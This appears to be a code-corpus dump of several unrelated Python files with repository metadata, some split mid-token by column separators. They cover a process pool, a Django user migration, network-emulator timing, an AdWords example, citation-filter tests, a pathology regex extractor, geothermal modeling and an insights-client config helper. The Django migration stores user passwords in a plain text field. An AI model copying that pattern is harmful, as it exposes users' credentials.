self._callback = callback
self.batch = batch
manager = Manager()
self.q = manager.Queue()
self.lock = manager.Lock()
self.event = manager.Event()
self._counter = manager.Value('counter', counter or 0)
self._shared = {var_name: manager.Value(var_name, var_value) for var_name, var_value in shared.iteritems()}
self.producerProcessList = [Producer() for _ in xrange(producer_count)]
self.consumerProcessList = [Consumer(fn=fn) for _ in xrange(consumer_count)]
self.pool = ProcessPool(consumer_count + producer_count)
@property
def q_size(self):
return self.q.qsize() + sum([x.q_size or 0 for x in self.producerProcessList])
@property
def counter(self):
return self._counter.value
@property
def shared(self):
return {var_name: var_value_proxy.value for var_name, var_value_proxy in self._shared.iteritems()}
def put(self, todo_list):
producer = self.producerProcessList.pop(0)
if self.batch:
producer.put(todo_list)
else:
producer.put(*todo_list)
self.producerProcessList.append(producer)
time.sleep(0.01)
def run(self, *args, **kwargs):
results = []
arg = (self.q, self.lock, self.event, self._counter, self.q_size)
kwargs.update(self._shared)
for producer in self.producerProcessList:
self.pool.apply_async(producer, arg + args, kwargs)
for consumer in self.consumerProcessList:
results.append(self.pool.apply_async(consumer, arg + args, kwargs, self._cb))
return results
def _cb(self, *args, **kwargs):
if self._callback:
self._callback(self.counter, self._shared)
def finish(self):
for producer in self.producerProcessList:
producer.finish()
self.pool.close()
time.sleep(0.03)
self.event.set()
self.pool.join()
# def work(data, counter, *args, **kwargs):
# pid = os.getpid()
# print '%s doing %s' % (pid, data)
# # counter = args[0] if len(args) > 0 else None
# if counter:
# counter.value += 1
# kwargs['var_a'].value += chr(len(kwargs['var_a'].value) + 65)
# return '%s result' % pid
#
#
# def cb(*args, **kwargs):
# print 'callback', args, kwargs
#
#
# def test():
# import random
# n = 0
# task = Task(work, 1, 3, counter=n, var_a='', callback=cb)
# results = task.run()
# for i in xrange(26):
# lines = ["%d" % i] * random.randint(10, 20)
# task.put(lines)
#
# task.finish()
#
# print 'end counter', task.counter
# print 'shared.var_a', task.shared['var_a']
# print 'results:\n' + '\n'.join([str(res.get()) for res in results])
#
# if __name__ == '__main__':
# test()
|
meliora000/eb_django_app
|
django_eb/users/migrations/0001_initial.py
|
Python
|
mit
| 796
| 0.001256
|
# -*- coding: utf-8 -*-
# Generated by Django 1.
|
9 on 2015-12-30 01:33
from __future__ import unicode_literals
from django.db import migrations, models
class Mig
|
ration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='USER',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('userid', models.CharField(max_length=200)),
('userpassword', models.CharField(max_length=200)),
('add', models.CharField(max_length=200)),
('phone', models.CharField(max_length=200)),
],
),
]
|
mpeuster/son-emu
|
examples/performance_measurements/osm_component_startup.py
|
Python
|
apache-2.0
| 3,883
| 0.000258
|
#!/usr/bin/env python2
# Copyright (c) 2019 Erik Schilling
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import time
from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint
from emuvim.api.osm.kafka import Kafka
from emuvim.api.osm.lcm import LCM
from emuvim.api.osm.mongo import Mongo
from emuvim.api.osm.mysql import Mysql
from emuvim.api.osm.nbi import NBI
from emuvim.api.osm.ro import RO
from emuvim.api.osm.zookeeper import Zookeeper
from emuvim.dcemulator.net import DCNetwork
from mininet.log import setLogLevel
setLogLevel('debug')
COUNT = 15
with open('osm_component_startup_%d.csv' % time.time(), 'w') as csvfile:
fieldnames = ['other', 'zookeeper', 'kafka', 'mongo', 'nbi', 'ro_db', 'ro', 'lcm']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for i in range(COUNT):
start = time.time()
net = DCNetwork(monitor=False, enable_learning=True)
api = None
try:
dc1 = net.addDatacenter("dc1")
api = OpenstackApiEndpoint("0.0.0.0", 6001)
api.connect_datacenter(dc1)
api.connect_dc_network(net)
s1 = net.addSwitch('s1')
zookeeper_ip = '10.0.0.96'
kafka_ip = '10.0.0.97'
mongo_ip = '10.0.0.98'
nbi_ip = '10.0.0.99'
ro_db_ip = '10.0.0.100'
ro_ip = '10.0.0.101'
lcm_ip = '10.0.0.102'
d1 = net.addDocker('d1', dimage='ubuntu:trusty')
VERSION = 'releasefive-daily'
zookeeper = Zookeeper(net, zookeeper_ip)
kafka = Kafka(net, kafka_ip, zookeeper_ip)
mongo = Mongo(net, mongo_ip)
nbi = NBI(net, nbi_ip, mongo_ip, kafka_ip)
ro_db = Mysql(net, ro_db_ip)
ro = RO(net, ro_ip, ro_db_ip, version=VERSION)
lcm = LCM(net, lcm_ip, ro_ip, mongo_ip, kafka_ip)
net.addLink(d1, s1)
net.addLink(zookeeper.instance, s1)
net.addLink(kafka.instance, s1)
net.addLink(mongo.instance, s1)
net.addLink(nbi.instance, s1)
net.addLink(ro_db.instance, s1)
net.addLink(ro.instance, s1)
net.addLink(lcm.instance, s1)
net.start()
api.start()
other_end = time.time()
zookeeper.start()
zookeeper_started = time.time()
kafka.start()
kafka_started = time.time()
mongo.start()
mongo_started = time.time()
nbi.start()
nbi_started = time.time()
ro_db.start()
ro_db_started = time.time()
ro.start()
ro_started = t
|
ime.time()
lcm.start()
lcm_started = time.time()
|
writer.writerow({
'other': other_end - start,
'zookeeper': zookeeper_started - other_end,
'kafka': kafka_started - zookeeper_started,
'mongo': mongo_started - kafka_started,
'nbi': nbi_started - mongo_started,
'ro_db': ro_db_started - nbi_started,
'ro': ro_started - ro_db_started,
'lcm': lcm_started - ro_started,
})
csvfile.flush()
finally:
net.stop()
api.stop()
|
googleads/googleads-python-lib
|
examples/adwords/v201809/advanced_operations/add_ad_customizer.py
|
Python
|
apache-2.0
| 8,193
| 0.006713
|
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adds an ad customizer feed.
Associates the feed with customer and adds an ad that uses the feed to populate
dynamic data.
"""
from datetime import datetime
from uuid import uuid4
# Import appropriate classes from the client library.
from googleads import adwords
from googleads import errors
FEED_NAME = 'Interplanetary Feed Name %s' % uuid4()
ADGROUPS = [
'INSERT_ADGROUP_ID_1_HERE',
'INSERT_ADGROUP_ID_2_HERE'
]
def CreateAdsWithCustomizations(client, adgroup_ids, feed_name):
"""Creates ExpandedTextAds that use ad customizations for specified AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing the AdGroup ids to add ExpandedTextAds to.
feed_name: the name of the feed used to apply customizations.
Raises:
GoogleAdsError: if no ExpandedTextAds were added.
"""
# Get the AdGroupAdService
adgroup_ad_service = client.GetService('AdGroupAdService', 'v201809')
expanded_text_ad = {
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Luxury Cruise to {=%s.Name}' % feed_name,
'headlinePar
|
t2': 'Only {=%s.Price}' % feed_name,
'description': 'Offer ends in {=countdown(%s.Date)}!' % feed_name,
'finalUrls': ['http://www.exam
|
ple.com'],
}
# We add the same ad to both ad groups. When they serve, they will show
# different values, since they match different feed items.
operations = [{
'operator': 'ADD',
'operand': {
'adGroupId': adgroup,
'ad': expanded_text_ad
}
} for adgroup in adgroup_ids]
response = adgroup_ad_service.mutate(operations)
if response and 'value' in response:
for ad in response['value']:
print('Created an ad with ID "%s", type "%s", and status "%s".'
% (ad['ad']['id'], ad['ad']['Ad.Type'], ad['status']))
else:
raise errors.GoogleAdsError('No ads were added.')
def CreateCustomizerFeed(client, feed_name):
"""Creates a new AdCustomizerFeed.
Args:
client: an AdWordsClient instance.
feed_name: the name for the new AdCustomizerFeed.
Returns:
The new AdCustomizerFeed.
"""
# Get the AdCustomizerFeedService
ad_customizer_feed_service = client.GetService('AdCustomizerFeedService',
'v201809')
customizer_feed = {
'feedName': feed_name,
'feedAttributes': [
{'type': 'STRING', 'name': 'Name'},
{'type': 'STRING', 'name': 'Price'},
{'type': 'DATE_TIME', 'name': 'Date'}
]
}
feed_service_operation = {
'operator': 'ADD',
'operand': customizer_feed
}
response = ad_customizer_feed_service.mutate([feed_service_operation])
if response and 'value' in response:
feed = response['value'][0]
feed_data = {
'feedId': feed['feedId'],
'nameId': feed['feedAttributes'][0]['id'],
'priceId': feed['feedAttributes'][1]['id'],
'dateId': feed['feedAttributes'][2]['id']
}
print('Feed with name "%s" and ID %s was added with:\n'
'\tName attribute ID %s and price attribute ID %s and date attribute'
'ID %s') % (feed['feedName'], feed['feedId'], feed_data['nameId'],
feed_data['priceId'], feed_data['dateId'])
return feed
else:
raise errors.GoogleAdsError('No feeds were added')
def RestrictFeedItemToAdGroup(client, feed_item, adgroup_id):
"""Restricts the feed item to an ad group.
Args:
client: an AdWordsClient instance.
feed_item: The feed item.
adgroup_id: The ad group ID.
"""
# Get the FeedItemTargetService
feed_item_target_service = client.GetService(
'FeedItemTargetService', 'v201809')
# Optional: Restrict the first feed item to only serve with ads for the
# specified ad group ID.
ad_group_target = {
'xsi_type': 'FeedItemAdGroupTarget',
'feedId': feed_item['feedId'],
'feedItemId': feed_item['feedItemId'],
'adGroupId': adgroup_id
}
operation = {'operator': 'ADD', 'operand': ad_group_target}
response = feed_item_target_service.mutate([operation])
new_ad_group_target = response['value'][0]
print('Feed item target for feed ID %s and feed item ID %s was created to '
'restrict serving to ad group ID %s' %
(new_ad_group_target['feedId'],
new_ad_group_target['feedItemId'],
new_ad_group_target['adGroupId']))
def CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed):
"""Creates FeedItems for the specified AdGroups.
These FeedItems contain values to use in ad customizations for the AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing two AdGroup Ids.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Raises:
GoogleAdsError: if no FeedItems were added.
"""
# Get the FeedItemService
feed_item_service = client.GetService('FeedItemService', 'v201809')
now = datetime.now()
mars_date = datetime(now.year, now.month, 1, 0, 0)
venus_date = datetime(now.year, now.month, 15, 0, 0)
time_format = '%Y%m%d %H%M%S'
feed_item_operations = [
CreateFeedItemAddOperation(
'Mars', '$1234.56', mars_date.strftime(time_format),
ad_customizer_feed),
CreateFeedItemAddOperation(
'Venus', '$1450.00', venus_date.strftime(time_format),
ad_customizer_feed)
]
response = feed_item_service.mutate(feed_item_operations)
if 'value' in response:
for feed_item in response['value']:
print('Added FeedItem with ID %d.' % feed_item['feedItemId'])
else:
raise errors.GoogleAdsError('No FeedItems were added.')
for feed_item, adgroup_id in zip(response['value'], adgroup_ids):
RestrictFeedItemToAdGroup(client, feed_item, adgroup_id)
def CreateFeedItemAddOperation(name, price, date, ad_customizer_feed):
"""Creates a FeedItemOperation.
The generated FeedItemOperation will create a FeedItem with the specified
values when sent to FeedItemService.mutate.
Args:
name: the value for the name attribute of the FeedItem.
price: the value for the price attribute of the FeedItem.
date: the value for the date attribute of the FeedItem.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Returns:
A new FeedItemOperation for adding a FeedItem.
"""
feed_item = {
'feedId': ad_customizer_feed['feedId'],
'attributeValues': [
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][0]['id'],
'stringValue': name
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][1]['id'],
'stringValue': price
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][2]['id'],
'stringValue': date
}
]
}
operation = {
'operator': 'ADD',
'operand': feed_item
}
return operation
def main(client, adgroup_ids, feed_name=FEED_NAME):
# Create a customizer feed. One feed per account can be used for all ads.
ad_customizer_feed = CreateCustomizerFeed(client, feed_name)
# Add feed items containing the values we'd like to place in ads.
CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed)
# All set! We can now create ads with customizations.
CreateAdsWithCustomizations(client, adgroup_ids, feed_name)
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_clien
|
pubs/pubs
|
tests/test_queries.py
|
Python
|
lgpl-3.0
| 9,022
| 0.001331
|
# coding: utf8
from __future__ import unicode_literals
import unittest
import dotdot
from pubs.query import (AuthorFilter, CitekeyFilter, FieldFilter,
YearFilter, _query_block_to_filter,
get_paper_filter, InvalidQuery)
from pubs.paper import Paper
import fixtures
doe_paper = Paper.from_bibentry(fixtures.doe_bibentry)
page_paper = Paper.from_bibentry(fixtures.page_bibentry)
turing_paper = Paper.from_bibentry(fixtures.turing_bibentry,
metadata=fixtures.turing_metadata)
class TestAuthorFilter(unittest.TestCase):
def test_fails_if_no_author(self):
no_doe = doe_paper.deepcopy()
no_doe.bibentry['Doe2013']['author'] = []
self.assertFalse(AuthorFilter('whatever')(no_doe))
def test_match_case(self):
self.assertTrue(AuthorFilter('doe')(doe_paper))
self.assertTrue(AuthorFilter('doe', case_sensitive=False)(doe_paper))
self.assertTrue(AuthorFilter('Doe')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(AuthorFilter('dOe')(doe_paper))
self.assertFalse(AuthorFilter('dOe', case_sensitive=True)(doe_paper))
self.assertFalse(AuthorF
|
ilter('doe', case_sensitive=True)(doe_paper))
self.assertTrue(AuthorFilter('dOe', case_sensitive=False)(doe_paper))
def test_match_not_first_author(self):
self.assertTrue(A
|
uthorFilter('motwani')(page_paper))
def test_do_not_match_first_name(self):
self.assertFalse(AuthorFilter('lawrence')(page_paper))
class TestCitekeyFilter(unittest.TestCase):
def test_fails_if_no_citekey(self):
no_citekey = doe_paper.deepcopy()
no_citekey.citekey = ''
self.assertFalse(CitekeyFilter('whatever')(no_citekey))
def test_match_case(self):
self.assertTrue(CitekeyFilter('doe201')(doe_paper))
self.assertTrue(CitekeyFilter('doe201', case_sensitive=False)(doe_paper))
self.assertTrue(CitekeyFilter('Doe201')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(CitekeyFilter('dOe201')(doe_paper))
self.assertFalse(CitekeyFilter('dOe201', case_sensitive=True)(doe_paper))
self.assertFalse(CitekeyFilter('doe201', case_sensitive=True)(doe_paper))
self.assertTrue(CitekeyFilter('dOe201', case_sensitive=False)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "{G}r{\\\"u}n2013"
self.assertTrue(CitekeyFilter('Grün')(latexenc_paper))
self.assertTrue(CitekeyFilter('Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertTrue(CitekeyFilter("Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertFalse(CitekeyFilter("Jalapen\u0303o", strict=True)(latexenc_paper))
latexenc_paper.citekey = "{G}ros2013"
self.assertFalse(CitekeyFilter("Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Gros2013"
self.assertFalse(
CitekeyFilter("gros", case_sensitive=False, strict=True)(latexenc_paper))
class TestCheckTag(unittest.TestCase):
pass
class TestCheckYear(unittest.TestCase):
def test_single_year(self):
self.assertTrue(YearFilter('2013')(doe_paper))
self.assertFalse(YearFilter('2014')(doe_paper))
def test_before_year(self):
self.assertTrue(YearFilter('-2013')(doe_paper))
self.assertTrue(YearFilter('-2014')(doe_paper))
self.assertFalse(YearFilter('-2012')(doe_paper))
def test_after_year(self):
self.assertTrue(YearFilter('2013-')(doe_paper))
self.assertTrue(YearFilter('2012-')(doe_paper))
self.assertFalse(YearFilter('2014-')(doe_paper))
def test_year_range(self):
self.assertTrue(YearFilter('')(doe_paper))
self.assertTrue(YearFilter('-')(doe_paper))
self.assertTrue(YearFilter('2013-2013')(doe_paper))
self.assertTrue(YearFilter('2012-2014')(doe_paper))
self.assertFalse(YearFilter('2014-2015')(doe_paper))
with self.assertRaises(ValueError):
YearFilter('2015-2014')(doe_paper)
class TestCheckField(unittest.TestCase):
def test_match_case(self):
self.assertTrue(FieldFilter('title', 'nice')(doe_paper))
self.assertTrue(
FieldFilter('title', 'nice', case_sensitive=False)(doe_paper))
self.assertTrue(FieldFilter('year', '2013')(doe_paper))
def test_do_not_match_case(self):
self.assertTrue(
FieldFilter('title', 'Title', case_sensitive=True)(doe_paper))
self.assertFalse(
FieldFilter('title', 'nice', case_sensitive=True)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "{G}r{\\\"u}n"
self.assertTrue(
FieldFilter('title', 'Grün')(latexenc_paper))
self.assertTrue(
FieldFilter('title', 'Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertTrue(
FieldFilter('title', "Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertFalse(FieldFilter('title', "Jalapen\u0303o",
strict=True)(latexenc_paper))
latexenc_paper.bibentry['Doe2013']['title'] = "{G}ros"
self.assertFalse(
FieldFilter('title', "Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Gros"
self.assertFalse(
FieldFilter('title', "gros", case_sensitive=False,
strict=True)(latexenc_paper))
class TestCheckQueryBlock(unittest.TestCase):
def test_raise_invalid_if_no_value(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('title')
def test_raise_invalid_if_too_much(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('whatever:value:too_much')
class TestFilterPaper(unittest.TestCase):
def test_case(self):
self.assertTrue(get_paper_filter(['title:nice'])(doe_paper))
self.assertTrue(get_paper_filter(['title:Nice'])(doe_paper))
self.assertFalse(get_paper_filter(['title:nIce'])(doe_paper))
def test_fields(self):
self.assertTrue(get_paper_filter(['year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['year:2010-'])(doe_paper))
self.assertFalse(get_paper_filter(['year:2014'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe'])(doe_paper))
self.assertTrue(get_paper_filter(['author:Doe'])(doe_paper))
def test_tags(self):
self.assertTrue(get_paper_filter(['tag:computer'])(turing_paper))
self.assertFalse(get_paper_filter(['tag:Ai'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:AI'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:ai'])(turing_paper))
def test_multiple(self):
self.assertTrue(get_paper_filter(['author:doe', 'year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe', 'year:2010-2014'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doe', 'year:2014-'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doee', 'year:2014'])(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"{E}l Ni{\~n}o"
latexenc_paper.bibentry['Doe2013']['author'][0] = r"Erd\H{o}s,
|
esilgard/BreastMR
|
fhcrc_pathology/Pathologist.py
|
Python
|
apache-2.0
| 744
| 0.005376
|
'''author@esilgard'''
#
# Copyright (c) 2014-2016 Fred Hutchinson Cancer Research Center
#
# Licensed under the Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
#
from OneFieldPerReport import OneFieldPerReport
import glo
|
bal_strings as gb
class Pathologist(OneFieldPerReport):
''' extract the name of the pathologist who initially signed the report '''
__version__ = 'Pathologist1.0'
def __init__(self):
super(Pathologist, self).__init__()
self.field_name = 'Pathologist'
self.regex = r'\n([A-Za-z\'\-,. ]+) MD(, PhD)?[ ]*\n[ ]*Pathologist[ ]*\n'
self.confidence = 1
self.match_style = 'first'
|
self.table = gb.PATHOLOGY_TABLE
self.value_type = 'match'
|
eusoubrasileiro/fatiando_seismic
|
fatiando/geothermal/climsig.py
|
Python
|
bsd-3-clause
| 7,793
| 0
|
r"""
Modeling and inversion of temperature residuals measured in wells due to
temperature perturbations in the surface.
Perturbations can be of two kinds: **abrupt** or **linear**.
Forward modeling of these types of changes is done with functions:
* :func:`~fatiando.geothermal.climsig.abrupt`
* :func:`~fatiando.geothermal.climsig.linear`
Assumeing that the temperature perturbation was abrupt. The residual
temperature at a depth :math:`z_i` in the well at a time :math:`t` after the
perturbation is given by
.. math::
T_i(z_i) = A \left[1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)\right]
where :math:`A` is the amplitude of the perturbation, :math:`\lambda` is the
thermal diffusivity of the medium, and :math:`\mathrm{erf}` is the error
function.
For the case of a linear change, the temperature is
.. math::
T_i(z_i) = A \left[
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
\right]
Given the temperature measured at different depths, we can **inver
|
t** for the
amplitude and age of the change. The available inversion solvers are:
* :class:`~fa
|
tiando.geothermal.climsig.SingleChange`: inverts for the
parameters of a single temperature change. Can use both abrupt and linear
models.
----
"""
from __future__ import division
import numpy
import scipy.special
from ..inversion.base import Misfit
from ..constants import THERMAL_DIFFUSIVITY_YEAR
def linear(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to a linear
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
Time since the perturbation occured (in years)
* zp : array
The depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
tmp = zp / numpy.sqrt(4. * diffus * age)
res = amp * ((1. + 2 * tmp ** 2) * scipy.special.erfc(tmp)
- 2. / numpy.sqrt(numpy.pi) * tmp * numpy.exp(-tmp ** 2))
return res
def abrupt(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to an abrupt
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
Time since the perturbation occured (in years)
* zp : array
Arry with the depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
return amp * (1. - scipy.special.erf(zp / numpy.sqrt(4. * diffus * age)))
class SingleChange(Misfit):
r"""
Invert the well temperature data for a single change in temperature.
The parameters of the change are its amplitude and age.
See the docstring of :mod:`fatiando.geothermal.climsig` for more
information and examples.
Parameters:
* temp : array
The temperature profile
* zp : array
Depths along the profile
* mode : string
The type of change: ``'abrupt'`` for an abrupt change, ``'linear'`` for
a linear change.
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
.. note::
The recommended solver for this inverse problem is the
Levemberg-Marquardt method. Since this is a non-linear problem, set the
desired method and initial solution using the
:meth:`~fatiando.inversion.base.FitMixin.config` method.
See the example bellow.
Example with synthetic data:
>>> import numpy
>>> zp = numpy.arange(0, 100, 1)
>>> # For an ABRUPT change
>>> amp = 2
>>> age = 100 # Uses years to avoid overflows
>>> temp = abrupt(amp, age, zp)
>>> # Run the inversion for the amplitude and time
>>> # This is a non-linear problem, so use the Levemberg-Marquardt
>>> # algorithm with an initial estimate
>>> solver = SingleChange(temp, zp, mode='abrupt').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 2.00 age: 100.00
>>> # For a LINEAR change
>>> amp = 3.45
>>> age = 52.5
>>> temp = linear(amp, age, zp)
>>> solver = SingleChange(temp, zp, mode='linear').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 3.45 age: 52.50
Notes:
For **abrupt** changes, derivatives with respect to the amplitude and age
are calculated using the formula
.. math::
\frac{\partial T_i}{\partial A} = 1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)
and
.. math::
\frac{\partial T_i}{\partial t} = \frac{A}{t\sqrt{\pi}}
\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\exp\left[-\left(\frac{z_i}{\sqrt{4\lambda t}}\right)^2\right]
respectively.
For **linear** changes, derivatives with respect to the age are calculated
using a 2-point finite difference approximation. Derivatives with respect
to amplitude are calculate using the formula
.. math::
\frac{\partial T_i}{\partial A} =
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
"""
def __init__(self, temp, zp, mode, diffus=THERMAL_DIFFUSIVITY_YEAR):
if len(temp) != len(zp):
raise ValueError("temp and zp must be of same length")
if mode not in ['abrupt', 'linear']:
raise ValueError("Invalid mode: %s. Must be 'abrupt' or 'linear'"
% (mode))
super(SingleChange, self).__init__(
data=temp,
positional=dict(zp=zp),
model=dict(diffus=float(diffus), mode=mode),
nparams=2, islinear=False)
def _get_predicted(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
if self.model['mode'] == 'abrupt':
return abrupt(amp, age, zp, diffus)
if self.model['mode'] == 'linear':
return linear(amp, age, zp, diffus)
def _get_jacobian(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
mode = self.model['mode']
if mode == 'abrupt':
tmp = zp / numpy.sqrt(4. * diffus * age)
jac = numpy.transpose([
abrupt(1., age, zp, diffus),
(amp * tmp * numpy.exp(-(tmp ** 2)) /
(numpy.sqrt(numpy.pi) * age))])
if mode == 'linear':
delta = 0.5
at_p = linear(amp, age, zp, diffus)
jac = numpy.transpose([
linear(1., age, zp, diffus),
(linear(amp, age + delta, zp, diffus) -
linear(amp, age - delta, zp, diffus)) / (2 * delta)])
return jac
|
wcmitchell/insights-core
|
insights/client/auto_config.py
|
Python
|
apache-2.0
| 7,561
| 0.000265
|
"""
Auto Configuration Helper
"""
import logging
import os
import requests
from urlparse import urlparse
from constants import InsightsConstants as constants
from cert_auth import rhsmCertificate
from connection import InsightsConnection
from config import CONFIG as config
logger = logging.getLogger(__name__)
APP_NAME = constants.app_name
def verify_connectivity():
"""
Verify connectivity to satellite server
"""
logger.debug("Verifying Connectivity")
ic = InsightsConnection()
try:
branch_info = ic.branch_info()
except requests.ConnectionError as e:
logger.debug(e)
logger.debug("Failed to connect to satellite")
return False
except LookupError as e:
logger.debug(e)
logger.debug("Failed to parse response from satellite")
return False
try:
remote_leaf = branch_info['remote_leaf']
return remote_leaf
except LookupError as e:
logger.debug(e)
logger.debug("Failed to find accurate branch_info")
return False
def set_auto_configuration(hostname, ca_cert, proxy):
"""
Set config based on discovered data
"""
logger.debug("Attempting to auto configure!")
logger.debug("Attempting to auto configure hostname: %s", hostname)
logger.debug("Attempting to auto configure CA cert: %s", ca_cert)
logger.debug("Attempting to auto configure proxy: %s", proxy)
saved_base_url = config['base_url']
if ca_cert is not None:
saved_cert_verify = config['cert_verify']
config['cert_verify'] = ca_cert
if proxy is not None:
saved_proxy
|
= config['proxy']
config['proxy'] = proxy
config['base_url'] = hostname + '/r/insights'
if not verify_connectivity():
logger.warn("Could not auto configure,
|
falling back to static config")
logger.warn("See %s for additional information",
constants.default_log_file)
config['base_url'] = saved_base_url
if proxy is not None:
if saved_proxy is not None and saved_proxy.lower() == 'none':
saved_proxy = None
config['proxy'] = saved_proxy
if ca_cert is not None:
config['cert_verify'] = saved_cert_verify
def _try_satellite6_configuration():
"""
Try to autoconfigure for Satellite 6
"""
try:
from rhsm.config import initConfig
rhsm_config = initConfig()
logger.debug('Trying to autoconf Satellite 6')
cert = file(rhsmCertificate.certpath(), 'r').read()
key = file(rhsmCertificate.keypath(), 'r').read()
rhsm = rhsmCertificate(key, cert)
# This will throw an exception if we are not registered
logger.debug('Checking if system is subscription-manager registered')
rhsm.getConsumerId()
logger.debug('System is subscription-manager registered')
rhsm_hostname = rhsm_config.get('server', 'hostname')
rhsm_hostport = rhsm_config.get('server', 'port')
rhsm_proxy_hostname = rhsm_config.get('server', 'proxy_hostname').strip()
rhsm_proxy_port = rhsm_config.get('server', 'proxy_port').strip()
rhsm_proxy_user = rhsm_config.get('server', 'proxy_user').strip()
rhsm_proxy_pass = rhsm_config.get('server', 'proxy_password').strip()
proxy = None
if rhsm_proxy_hostname != "":
logger.debug("Found rhsm_proxy_hostname %s", rhsm_proxy_hostname)
proxy = "http://"
if rhsm_proxy_user != "" and rhsm_proxy_pass != "":
logger.debug("Found user and password for rhsm_proxy")
proxy = proxy + rhsm_proxy_user + ":" + rhsm_proxy_pass + "@"
